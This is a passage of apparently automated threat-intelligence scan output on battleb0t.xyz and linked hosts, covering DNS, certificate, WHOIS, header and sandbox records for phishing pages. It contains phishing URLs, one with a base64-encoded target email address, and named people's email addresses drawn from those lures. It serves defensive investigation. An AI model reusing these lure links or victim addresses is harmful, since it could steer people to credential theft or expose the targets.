[%TEMP%\\CabC118.tmp]- [targetUID: 00000000-00002300]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002300]\n "CabC13A.tmp" has type "data"- Location: [%TEMP%\\CabC13A.tmp]- [targetUID: 00000000-00002300]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "6O2TX2Q0.htm" has type "HTML document ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\37NU00GP\\6O2TX2Q0.htm]- [targetUID: 00000000-00002300]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts random domain names', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"www.guelphcrc.ca" seems to be random'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://llink.to/?u=https%3A%2F%2Fwww.guelphcrc.ca%2FI%2Fbenjamin.mckenzie%40atimetals.com"\n Pattern match: "https://llink.to"\n Pattern match: "https://track.salesflare.com/flare.js"\n Pattern match: "https://api.salesflare.com/,a=new"\n Pattern match: "SUIDmicrosoft.com/92161314803231032233320740896031032115MUID31E817B6939460D9349A04BB92D861F2microsoft.com/102514563724831110587320740896031032115_EDGE_Vmicrosoft.com/921614563724831110587320756521031032115SRCHDAF=NOFORMmicrosoft.com/10243323789440310856102"\n Pattern match: "SUIDmicrosoft.com/92161314803231032233320740896031032115MUID31E817B6939460D9349A04BB92D861F2microsoft.com/102514563724831110587320740896031032115SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743SRCHUIDV=2&GUID=426377958C8445E3B4EA69482BD0"\n Pattern match: "SUIDmicrosoft.com/92161314803231032233320740896031032115SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743SRCHUIDV=2&GUID=426377958C8445E3B4EA69482BD0E747&dmnchg=1microsoft.com/102433237894403108561027971357230938743SRCHUSRDOB=20220131micr"\n Pattern match: "921614563724831110587321084646031032115MUID1C22022E23466767041B1123220A6603msn.com/102514563724831110587321084646031032115"\n Pattern match: "https://west.exchserverdata.one/?email=YmVuamFtaW4ubWNrZW56aWVAYXRpbWV0YWxzLmNvbQ=="\n Pattern match: "MUIDB31E817B6939460D9349A04BB92D861F2ieonline.microsoft.com/921614563724831110587320756521031032115"\n Pattern match: "isdomainmigratedtruewww.msn.com/1025103905676831068342321084646031032115"\n Pattern match: |
| 2023-05-12 02:44:15 | SSL Certificate - Issued to | No | SSL Certificate Analyzer | 1 | 0 | 2 | 0 | None | C=US,ST=California,L=San Francisco,O=Netlify\, Inc,CN=*.netlify.app | funny.battleb0t.xyz |
| 2023-05-12 03:04:14 | Malicious Affiliate | Yes | abuse.ch | 0 | 1 | 3 | 0 | None | abuse.ch URLhaus (Domain) [cdn-185-199-108-153.github.com]
https://urlhaus.abuse.ch/downloads/csv_recent/ | cdn-185-199-108-153.github.com |
| 2023-05-12 02:54:34 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["-"], "Connection": ["close"], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]} | 104.21.71.14 |
| 2023-05-12 02:44:28 | IP Address | No | DNS Resolver | 0 | 0 | 2 | 0 | None | 104.21.71.14 | nuke.battleb0t.xyz |
| 2023-05-12 03:09:08 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 165.232.113.94 | 165.232.113.85 |
| 2023-05-12 03:01:35 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.121): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:13:08 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [01-edu.github.io]
https://www.openphish.com/feed.txt | 01-edu.github.io |
| 2023-05-12 02:53:06 | Web Technology | No | Tool - WAFW00F | 0 | 0 | 2 | 0 | None | None None | nuke.battleb0t.xyz |
| 2023-05-12 03:09:35 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 215.30.196.104.bc.googleusercontent.com | 104.196.30.215 |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cf-ray: 7c5f8c5a3bb81a1b-EWR | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=6ZH4%2BS7iwGiB1Wu7l%2FAB03y2sKXJwRGFC2pyd%2BZjS4ZmLlnY7XMvuoX5GBTxa3DM3NheNEVhPebnH7oSWouKWRGMXi2e4r7tA5Bf491iZPTiDiZco8VmKugKJA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5a3bb81a1b-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:44:27 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:29:bb:71:26:4f:a3:73:c9:d3:c4:af:c8:b3:a3:33:dc:41
Signature Algorithm: ecdsa-with-SHA384
Issuer: C=US, O=Let's Encrypt, CN=E1
Validity
Not Before: Jan 23 21:31:46 2023 GMT
Not After : Apr 23 21:31:45 2023 GMT
Subject: CN=*.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:d7:c6:91:a2:7d:90:36:47:61:e7:f4:42:67:85:
67:bc:f6:01:51:cb:59:02:c5:69:c6:fb:5b:1b:b9:
c9:4a:2c:0e:df:23:05:55:0f:d4:97:b3:0f:c2:a8:
12:d7:19:fa:98:f0:06:8c:43:18:24:de:aa:3e:e6:
c7:25:79:67:99
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
37:BE:E1:FB:AE:23:1C:29:A5:8A:8C:D8:43:D1:35:F5:04:D1:88:E3
X509v3 Authority Key Identifier:
keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC
Authority Information Access:
OCSP - URI:http://e1.o.lencr.org
CA Issuers - URI:http://e1.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:*.battleb0t.xyz, DNS:battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Jan 23 22:31:46.387 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:E4:5D:77:E7:B9:FC:9E:AD:1C:B5:62:
14:DD:D8:A1:B9:93:A7:95:80:D0:27:BE:9B:FC:96:DD:
90:D7:C4:30:AA:02:20:05:D4:DE:FE:C2:15:EF:1B:42:
74:2D:E4:3F:4F:CB:73:3D:EC:7B:44:18:37:71:14:A8:
00:F1:6C:6D:6B:77:67
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Jan 23 22:31:46.397 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:BD:22:C5:30:9F:6F:36:15:B7:D1:CA:
AD:CF:EB:D0:94:75:7F:1F:5A:28:FD:93:B5:75:02:8F:
D1:C6:87:41:2E:02:20:7C:52:E6:58:A4:8D:55:6A:69:
9C:2C:54:4C:7F:AC:22:28:8D:2B:54:D7:47:45:0A:C9:
6B:D8:24:59:2E:89:1F
Signature Algorithm: ecdsa-with-SHA384
30:66:02:31:00:90:aa:85:4e:91:c5:53:b9:d9:ce:56:8c:48:
a4:84:84:df:15:f2:f7:bf:4b:d6:de:72:8d:e4:36:65:23:71:
d4:4d:c8:2a:c7:b7:82:2b:69:73:9f:f4:f6:c1:7d:a3:6f:02:
31:00:97:48:3c:2f:eb:bf:19:54:bc:8e:14:95:49:a7:05:bf:
e6:fa:13:41:2f:ff:2a:2b:4a:df:86:c2:17:9a:7a:15:fb:b9:
93:c8:cf:89:19:ce:5b:35:b7:4b:d3:57:36:16
| battleb0t.xyz |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | Reddit (Category: social)
https://www.reddit.com/user/Altpapier | Altpapier |
| 2023-05-12 03:31:32 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | abuse@dynadot.com | Domain Name: AYIU.XYZ
Registry Domain ID: D304640320-CNIC
Registrar WHOIS Server: whois.dynadot.com
Registrar URL: http://www.dynadot.com
Updated Date: 2022-06-28T04:15:13.0Z
Creation Date: 2022-06-23T04:11:38.0Z
Registry Expiry Date: 2023-06-23T23:59:59.0Z
Registrar: Dynadot LLC
Registrar IANA ID: 472
Domain Status: ok https://icann.org/epp#ok
Registrant Organization:
Registrant State/Province: California
Registrant Country: US
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: 170.NS1.ABOVE.COM
Name Server: 170.NS2.ABOVE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@dynadot.com
Registrar Abuse Contact Phone: +1.6502620100
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:17:33.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: AYIU.XYZ
Registry Domain ID: D304640320-CNIC
Registrar WHOIS Server: whois.dynadot.com
Registrar URL: http://www.dynadot.com
Updated Date: 2022-06-23T05:10:07.0Z
Creation Date: 2022-06-23T04:11:38.0Z
Registrar Registration Expiration Date: 2023-06-23T23:59:59.0Z
Registrar: DYNADOT LLC
Registrar IANA ID: 472
Registrar Abuse Contact Email: abuse@dynadot.com
Registrar Abuse Contact Phone: +1.6502620100
Registry Registrant ID: CPF-291635
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Dynadot Privacy Service
Registrant Street: PO Box 701
Registrant Street:
Registrant City: San Mateo
Registrant State/Province: California
Registrant Postal Code: 94401
Registrant Country: US
Registrant Phone: +1.6505854708
Registrant Email: https://www.dynadot.com/domain/contact-request?domain=ayiu.xyz
Registry Admin ID: CPF-291635
Admin Name: REDACTED FOR PRIVACY
Admin Organization: Dynadot Privacy Service
Admin Street: PO Box 701
Admin Street:
Admin City: San Mateo
Admin State/Province: California
Admin Postal Code: 94401
Admin Country: US
Admin Phone: +1.6505854708
Admin Email: https://www.dynadot.com/domain/contact-request?domain=ayiu.xyz
Registry Tech ID: CPF-291635
Tech Name: REDACTED FOR PRIVACY
Tech Organization: Dynadot Privacy Service
Tech Street: PO Box 701
Tech Street:
Tech City: San Mateo
Tech State/Province: California
Tech Postal Code: 94401
Tech Country: US
Tech Phone: +1.6505854708
Tech Email: https://www.dynadot.com/domain/contact-request?domain=ayiu.xyz
Name Server: 170.ns1.above.com
Name Server: 170.ns2.above.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2022-06-22 22:10:07 -0700 <<<
|
| 2023-05-12 02:54:41 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"Content_Length": ["0"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Nf_Request_Id": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "X_Nf_Request_Id": ["01H04595A0C45NR8DMSR5TCKG9"], "Date": ["<REDACTED>"], "Server": ["Netlify"]} | 104.196.30.220 |
| 2023-05-12 03:09:28 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | acilacikveteriner.com | 87.248.157.102 |
| 2023-05-12 03:33:34 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | !22222222222222222222222222222222222222222222222222
3 zVm
Y7a5mH
LyBu5
@rO$T
gt@G<U
rCrV8
e$?>z
DvgsWuM_
w"$RO WW
uvW_c
KT`\d
Vb /'T
T\"zw
:W4cn
Ga96A$
S$jFv
cBK8<
bp1MDND
.rzQ`l
kRgKHB'/
DajA 8
hZk68
59L'`
sM!2C
Khv3$\
zqLtj
:GRx4
$L705
IogY$c
qOD t
e:otz$
gk>Ci"dm
j@@EDjf
hprOSM
1ZiZC aQ0
EXaQ0
5VFE$
xX<nU
w2mJd
JxZ9229
U>Ys.
5DOzij
Nk6R$
O5hDf$
5aNES
oQE/j
gOIcq
8?e.xl
q5 <`
v3Lbs
psF 4
1E/QE
| https://pics.battleb0t.xyz/images/random_1.jpeg |
| 2023-05-12 02:51:33 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://this.props.pagesize/2)),e.currentdatapageendindex=math.min(e.currentdatapagestartindex+this.props.pagesize,this.props.rows.length-1),r=!0', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 26, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://89667lpjzo.thebassbite.com/fr-revenue-eservices-cra/index.php?=112726&redrisky%40icloud.com', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"SM0:6732:304:WilStaging_02"\n "InternetShortcutMutex"\n "Local\\SM0:6732:304:WilStaging_02"\n "SM0:6732:120:WilError_01"\n "Local\\SM0:6732:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.21.60.54:443"\n "138.91.254.96:443"\n "172.67.191.22:443"\n "142.251.46.195:443"\n "23.54.48.253:443"\n "198.103.206.14:443"\n "54.188.197.7:443"\n "142.251.46.163:443"\n "44.228.117.199:443"\n "44.233.87.152:443"\n "142.251.46.202:443"\n "152.199.4.33:443"\n "185.199.108.153:443"\n "23.39.0.132:443"\n "54.187.210.201:443"\n "63.140.36.119:443"\n "20.50.73.11:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"89667lpjzo.thebassbite.com"\n "ajax.googleapis.com"\n "api.edgeoffer.microsoft.com"\n "assets.adobedtm.com"\n "c.go-mpulse.net"\n "canada.demdex.net"\n "canada.sc.omtrdc.net"\n "canada.tt.omtrdc.net"\n "cdn.botframework.com"\n "cm.everesttech.net"\n "cra-arc.gc.ca"\n "cra-taxation-benefits-revenue-e1service-645a781e0a6ac.wefishmedia.com"\n "design.canada.ca"\n "dpm.demdex.net"\n "fonts.gstatic.com"\n "self.events.data.microsoft.com"\n "wet-boew.github.io"\n "www.google.az"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string ""paypal.com"," (Indicator: "dir "; File: "wallet-checkout-eligible-sites-pre-stable.json")\n Found string ""baysidebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""comeherebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""www.facebook.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""linkedin.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""manitobaharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""highkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""mandalascrubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""primalharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""amazingclubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""purehockey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""order.firehousesubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""cousinssubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""digikey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""hockeymonkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""4amscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""6whiskey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""99centsubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""allieandmickey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""alteregoscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""annabelbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""aspirefashionscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""augustbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""bananasmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""baseballmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-49', u'name': u'Drops ASP/PHP html files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"urlref_https89667lpjzo.thebassbite.comfr-revenue-eservices-craindex.php_112726_redrisky%40icloud.com" has type "HTML document ASCII text with no line terminators"- [targetUID: N/A]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlref_https89667lpjzo.thebassbite.comfr-revenue-eservices-craindex.php_112726_redrisky%40icloud.com" has type "HTML document ASCII text with no line terminators"- [targetUID: N/A]\n "shopping.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\2300_214408614\\shopping.js]- [targetUID: 00000000-00002300]\n "data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00003868]\n "Ruleset Data" has type "data"- [targetUID: 00000000-00002300]\n "wallet-stable.json" has type "ASCII text"- Location: [%TEMP%\\2300_581733700\\json\\wallet\\wallet-stable.json]- [targetUID: 00000000-00002300]\n "wallet.bundle.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%TEMP%\\2300_581733700\\wallet.bundle.js]- [targetUID: 00000000-00002300]\n "Filtering Rules" has type "data"- Location: [%TEMP%\\2300_917696848\\Filtering Rules]- [targetUID: 00000000-00002300]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%TEMP%\\2300_581733700\\edge_driver.js]- [targetUID: 00000000-00002300]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\2300_214408614\\edge_driver.js]- [targetUID: 00000000-00002300]\n "vendor.bundle.js" has type "ASCII text with very long lines"- Location: [%TEMP%\\2300_581733700\\vendor.bundle.js]- [targetUID: 00000000-00002300]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_1]- [targetUID: 00000000-00003868]\n "4265444a-c4d4-4b4c-bbe4-9cd8a74a3d12.tmp" has type "gzip compressed data from FAT filesystem (MS-DOS OS/2 NT) original size modulo 2^32 148518"- Location: [%TEMP%\\4265444a-c4d4-4b4c-bbe4-9cd8a74a3d12.tmp]- [targetUID: 00000000-00002300]\n "wallet-drawer.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\2300_581733700\\Wallet-Checkout\\wallet-drawer.bundle.js]- [targetUID: 00000000-00002300]\n "auto_open_controller.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\2300_214408614\\auto_open_controller.js]- [targetUID: 00000000-00002300]\n "f_0004d2" has type "gzip compressed data was "webchat-es5.js" last modified: Tue Jun 9 20:56:21 2020 max compression from Unix original size modulo 2^32 3055929"- [targetUID: N/A]\n "000009.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgeCoupons\\coupons_data.db\\000009.log]- [targetUID: 00000000-00002300]\n "000013.ldb" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgeCoupons\\coupons_data.db\\000013.ldb]- [targetUID: 00000000-00002300]\n "bnpl.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\2300_581733700\\bnpl\\bnpl.bundle.js]- [targetUID: 00000000-00002300]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00002300]\n "tokenized-card.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\2300_581733700\\Tokenized-Card\\tokenized-card.bundle.js]- [targetUID: 00000000-00002300]\n "edge_checkout_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\2300_214408614\\edge_checkout_page_validator.js]- [targetUID: 00000000-00002300]\n "edge_confirmation_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\2300_214408614\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00002300]\n "product_page.js" has type "UTF-8 Unicode text with very l | 185.199.108.153 |
| 2023-05-12 03:18:26 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | MCName (Minecraft) (Category: gaming)
https://mcname.info/en/search?q=Altpapier | Altpapier |
| 2023-05-12 03:27:00 | Linked URL - External | No | Web Server Identifier | 0 | 0 | 4 | 0 | None | http://127.0.0.1:* | {"cf-access-domain": "panel.battleb0t.xyz", "cf-ray": "7c5f606c5dec334e-EWR", "x-content-type-options": "nosniff", "content-security-policy": "frame-ancestors 'none'; connect-src 'self' http://127.0.0.1:*; default-src https: 'unsafe-inline'", "content-encoding": "gzip", "transfer-encoding": "chunked", "set-cookie": "CF_Session=nrj43fxpNUBlI2Utd; Path=/; Secure; Expires=Fri, 12 May 2023 06:54:22 GMT; HttpOnly; SameSite=none", "strict-transport-security": "max-age=31536000; includeSubDomains", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "x-xss-protection": "1; mode=block", "access-control-allow-credentials": "true", "date": "Fri, 12 May 2023 02:54:22 GMT", "access-control-allow-origin": "null", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "text/html", "x-frame-options": "DENY", "cf-version": "1432-d48eaba"} |
| 2023-05-12 02:54:13 | Open TCP Port | No | Censys | 0 | 0 | 4 | 0 | None | 2606:4700:3030::ac43:a8fc:443 | 2606:4700:3030::ac43:a8fc |
| 2023-05-12 03:00:26 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.6): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:09:41 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 126.48.229.35.bc.googleusercontent.com | 35.229.48.126 |
| 2023-05-12 03:03:17 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | ayhu.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
ff:0e:1e:a4:6f:55:f0:74:0e:b3:83:e1:07:c9:ea:93
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1P5
Validity
Not Before: Dec 14 04:12:07 2022 GMT
Not After : Mar 14 04:12:06 2023 GMT
Subject: CN=*.ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:c0:3f:15:01:81:40:92:70:87:14:2c:25:01:e5:
a7:7f:11:ff:2d:2c:1c:6c:21:42:67:4e:30:48:bf:
c1:33:05:3f:32:e6:9d:27:08:a8:f7:db:7e:1a:19:
1c:aa:99:e8:d8:96:24:37:12:c6:a7:26:93:c0:67:
f6:d7:bf:fc:b8:23:1f:07:9c:8a:3a:8e:50:72:7a:
0b:43:ee:28:4c:e1:d7:7b:d8:4b:14:51:0a:cf:12:
03:a0:03:83:38:8b:68:c0:ba:0b:40:43:da:e2:c7:
fd:15:ad:f1:8a:ab:ad:d4:e1:28:d8:1f:91:4f:47:
05:38:6f:51:ba:b9:1e:e4:8f:9a:e9:d0:3a:3f:ae:
54:23:1b:cb:47:92:67:43:7b:78:2f:12:0d:48:e5:
86:54:03:05:53:71:94:6f:99:ca:50:b2:16:e3:59:
